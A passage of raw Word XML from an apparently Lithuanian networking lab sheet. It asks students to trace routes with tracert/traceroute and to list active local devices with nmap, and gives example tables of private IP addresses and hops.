      <w:tr w:rsidR="007467FF" w:rsidRPr="005A5C28" w14:paraId="2EE5F91B" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D07B2CF" w14:textId="47C950AE" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B639E2C" w14:textId="1128FDA7" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.103</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07B7BD4D" w14:textId="4D6FB5D7" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Stebėjimo kamera</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47925B3F" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075D9303" w14:textId="77777777" w:rsidR="00DA21A6" w:rsidRPr="005A5C28" w:rsidRDefault="00DA21A6"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3 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KOMPIUTERIO KOMANDINĖJE EILUTĖJE NAUDODAMI ĮRANKIUS „TRACERT“ „TRACEROUTE“ UŽPILDYKITE PATEIKTĄ LENTELĘ. NURODYKITE IP ADRESĄ, KURĮ TIKRINATE, IR TARPINIUS MAZGUS IKI ADRESO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABD902" w14:textId="217C6DEE" w:rsidR="00D94CE4" w:rsidRPr="005A5C28" w:rsidRDefault="00D94CE4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B79655" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF"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O PAVYZDYS:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9915" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="5667"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4BA8C3B1" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2C0F3277" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5E0FD52C" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5667" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2071DFF0" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tarpiniai mazgai</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="59E0D2F8" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24683E69" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E2F0534" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE78B88" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1 hop 192.168.1.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="49BDA51A" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="210A69F5" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="278FAB21" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DA4E3A2" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1 hop 192.168.1.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="253BF454" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B73BBD4" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71F95E46" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06A28E5B" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1 hop 192.168.1.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="016307ED" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="081907FF" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43546E12" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190F775E" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1 hop 192.168.1.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007467FF" w:rsidRPr="005A5C28" w14:paraId="2A6E5660" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F33BA1B" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E7781B1" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19B7271D" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="121"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.1.254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="226445C6" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="121"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>53-79-9-254.static.zebra.lt [53.79.9.254]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD58648" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="121"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>72-125-189-128.static.zebra.lt [72.125.189.128]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498D71B1" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="121"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>google1.teo.lt [212.59.12.158]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524F5EC1" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="121"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>108.170.228.76</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F2E895" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="121"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>108.170.234.247</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D16723" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="121"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>dns.google [8.8.8.8]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65F45E3D" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D44E894" w14:textId="77777777" w:rsidR="00DA21A6" w:rsidRPr="005A5C28" w:rsidRDefault="00DA21A6"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4 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ATLIKITE NAUDOJAMO TINKLO SKENAVIMĄ IR NAUDODAMIESI PROGRAMA „NMAP“ NUSTATYKITE AKTYVIUS TINKLO ĮRENGINIUS. Į LENTELĘ SURAŠYKITE AKTYVIŲ ĮRENGINIŲ IP IR MAC ADRESUS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5265D31B" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF"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O PAVYZDYS:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9915" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="29F9C9A1" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="27608C33" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3DEF4EC1" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="20AD0DDE" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MAC adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="06E4E37D" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EB8E001" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
